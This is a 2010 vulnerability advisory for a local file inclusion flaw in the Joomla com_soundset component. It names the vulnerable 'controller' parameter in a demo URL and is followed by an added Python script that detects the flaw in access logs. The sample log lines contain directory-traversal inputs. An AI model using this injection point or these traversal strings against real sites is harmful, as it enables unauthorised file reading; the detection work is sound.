
# Title : Joomla Soundset Component (com_soundset) LFI Vulnerability
# Published : 2010-07-10
# Author : Sid3^effects


Name : Joomla com_soundset LFI Vulnerability
Date : July 10, 2010
Critical Level : HIGH
Vendor URL : http://www.soundset.at/
Author : Sid3^effects aKa HaRi
special thanks to : r0073r (inj3ct0r.com), L0rd CruSad3r, MaYur, MA1201, KeDar, Sonic, gunslinger_
greetz to : www.topsecure.net, All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description 
Soundset Tutorial is an interactive tutorial component for Joomla 1.5. Soundset Tutorial can be used to run a complex tutorial / How-To / etc. directly inside your Joomla website. Each tutorial is represented by a project. A project is assigned to a certain category, and unlimited nested categories are possible. A project consists of one or more units. Units provide interactive content and detailed descriptions; i.e. a unit provides video streaming capabilities and up to 6 user-defined files for download. Furthermore, this component provides basic support for CB 1.2 (email sending, avatar, profile page), private messaging (UddeIM), project bookmarking, rating, and commenting, as well as file browsing and file maintenance.
#######################################################################################################
Xploit: LFI Vulnerability

DEMO URL : http://server/index.php?option=com_soundset&controller=[LFI]
#######################################################################################################
# 0day no more 
# Sid3^effects
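
A log check for the parameter shown in the DEMO URL, as an added example that is not part of the original advisory: it flags requests to option=com_soundset whose controller value, after URL-decoding, is not a plain identifier. The identifier rule, the controller name "project" and the log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: a legitimate controller name is a plain identifier.
SAFE_CONTROLLER = re.compile(r"[A-Za-z0-9_]+")
# Request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (parse_qs already decoded once)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_controller(log_line):
    """Return the decoded controller value when a com_soundset request carries
    a controller that is not a plain identifier, otherwise None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    params = parse_qs(urlsplit(match.group(1)).query)
    if "com_soundset" not in params.get("option", []):
        return None  # a different component; out of scope for this check
    for raw in params.get("controller", []):
        value = fully_decode(raw)
        if not SAFE_CONTROLLER.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_index, decoded_value) for every flagged request."""
    hits = []
    for index, line in enumerate(lines):
        value = suspicious_controller(line)
        if value is not None:
            hits.append((index, value))
    return hits

# Constructed sample log lines (documentation IP range, placeholder values).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jul/2010:10:00:00 +0000] "GET /index.php?option=com_soundset&controller=project HTTP/1.1" 200 5120',
    '192.0.2.44 - - [10/Jul/2010:10:00:05 +0000] "GET /index.php?option=com_soundset&controller=..%2F..%2Fplaceholder HTTP/1.1" 200 312',
    '192.0.2.44 - - [10/Jul/2010:10:00:09 +0000] "GET /index.php?option=com_soundset&controller=%252e%252e%252fplaceholder HTTP/1.1" 200 312',
    '192.0.2.77 - - [10/Jul/2010:10:00:12 +0000] "GET /index.php?option=com_content&controller=..%2Fplaceholder HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for index, value in scan(SAMPLE_LOG):
        print(f"line {index}: controller={value!r}")
```

The same allowlist, applied to the controller value before the component uses it to build a file path, is the corresponding server-side mitigation.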